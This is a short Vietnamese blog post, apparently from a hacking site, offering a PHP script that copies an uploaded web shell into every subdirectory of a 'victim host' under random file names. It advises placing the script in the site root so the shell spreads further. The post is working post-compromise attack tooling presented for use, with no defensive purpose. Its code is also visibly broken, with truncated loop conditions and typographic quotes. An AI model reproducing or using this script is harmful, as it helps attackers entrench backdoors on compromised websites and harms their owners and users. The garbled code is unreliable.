Skip to main content

Code phát tán shell trong Host victim


Đặt con này cùng thư mục với con shell.

Thay dòng dưới cho phù hợp:
$shell = "ten_con_shell.php";
Sau đó gõ địa chỉ lên trình duyệt, nó sẽ copy vào tất cả thư mục con.Tốt nhất nên để ở thư mục gốc của site để phát tán nhiều hơn.
$shell = “ten_con_shell.php”; $host = $_SERVER['HTTP_HOST']; $root_dir = dirname(__FILE__); echo $root_dir.” “; lk(realpath(“./”)); function lk($d) { global $host; global $root_dir; global $shell; //echo “=====$d====== “; if ($handle = opendir($d)) { $dir_array = array(); while ($file = readdir($handle)) { if($file!=”.”&&$file!=”..”) { $realpath = $d.”/”.$file; if(is_dir($realpath)) $dir_array[]=$realpath; } } } for($i=0;$i { $new_name = rand(0, 1000).”.php”; $tmp = $dir_array[$i]; echo “http://”.str_replace($root_dir,$host,$tmp).”/”.$new_name.” “; copy($shell,$dir_array[$i].”\\”.$new_name); //echo $dir_array[$i].” “; } for($i=0;$i lk($dir_array[$i]); closedir($handle); }?>

Share